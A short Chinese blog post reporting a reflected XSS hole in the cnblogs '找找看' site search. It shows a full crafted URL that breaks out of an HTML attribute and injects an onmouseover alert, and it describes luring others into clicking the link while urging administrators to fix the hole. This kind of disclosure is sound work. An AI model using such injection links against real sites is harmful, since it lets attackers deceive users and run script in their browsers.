找找看XSS漏洞!!!

跨站式脚本攻击(XSS)被评为07年排名第一的Web安全漏洞，拿“找找看”试了一把，发现存在漏洞，希望管理员尽快改掉

XSS示例：

诱骗别人点击地址：

http://zzk.cnblogs.com/s?w=cnblogs%22%2F%3E+%3Cinput+type%3D%22submit%22+class%3D%22btnSearch%22+onmouseover%3Djavascript%3Aalert%28%27YouAreHacked%21%27%29++value%3D%22%E9%A2%86%E5%8F%96%E7%A7%AF%E5%88%86&t=

别人粗一看，是博客园的找找看，放心大胆的进来了，结果：

相关文章：

XSS漏洞《转》 2021-07-31
【漏洞学习——XSS】Protonmail的存储型XSS漏洞 2021-06-06
xss漏洞之——初识xss 2021-11-13
xss-漏洞分析 2019-03-03
xss漏洞校验 2021-11-03
XSS漏洞扫描 2021-12-12
xss漏洞挖掘 2021-04-07
XSS漏洞概述 2021-07-02

猜你喜欢

相关资源

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode